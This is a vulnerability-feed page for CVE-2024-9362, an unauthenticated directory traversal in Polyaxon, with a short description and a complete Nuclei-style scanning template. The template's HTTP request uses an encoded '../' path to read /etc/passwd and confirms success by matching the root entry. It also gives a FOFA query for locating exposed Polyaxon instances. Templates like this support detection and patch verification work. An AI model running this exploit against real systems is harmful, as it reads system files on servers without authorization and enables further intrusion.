CVE-2024-9362: Polyaxon - Unauthenticated Directory Traversal

2026-06-17 Polyaxon PoC Public

Description

Polyaxon latest version contains a path traversal caused by insufficient validation in directory access, letting unauthenticated attackers retrieve directory information and file contents, exploit requires no authentication.

PoC

id: CVE-2024-9362

info:
  name: Polyaxon - Unauthenticated Directory Traversal
  author: yunseo
  severity: high
  description: |
    Polyaxon latest version contains a path traversal caused by insufficient validation in directory access, letting unauthenticated attackers retrieve directory information and file contents, exploit requires no authentication.
  impact: |
    Attackers can access sensitive system directories and files, leading to information disclosure and potential further exploitation.
  remediation: |
    Update to the latest version with patched validation mechanisms.
  reference:
    - https://github.com/polyaxon/polyaxon
    - https://huntr.com/bounties/d8dcb40f-ce76-4524-8d06-e0f12a07809d
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-9362
    epss-score: 0.04274
    epss-percentile: 0.90589
    cwe-id: CWE-22
  metadata:
    max-request: 1
    verified: true
    fofa-query: title=="Polyaxon"
  tags: cve,cve2024,polyaxon,lfi,traversal,unauth

http:
  - method: GET
    path:
      - "{{BaseURL}}/streams/v1/polyaxon/default/s/runs/%2e%2e/artifact?stream=true&path=../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a00463044022013e0d9781b0796f302a17438c15444df3447b64a0c892a51a10fc4fbb0183038022029120afab26b7a4d676ccff23e4067f10c87a6cc778ca9f0812eaee0160d5d50:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

Related Vulnerabilities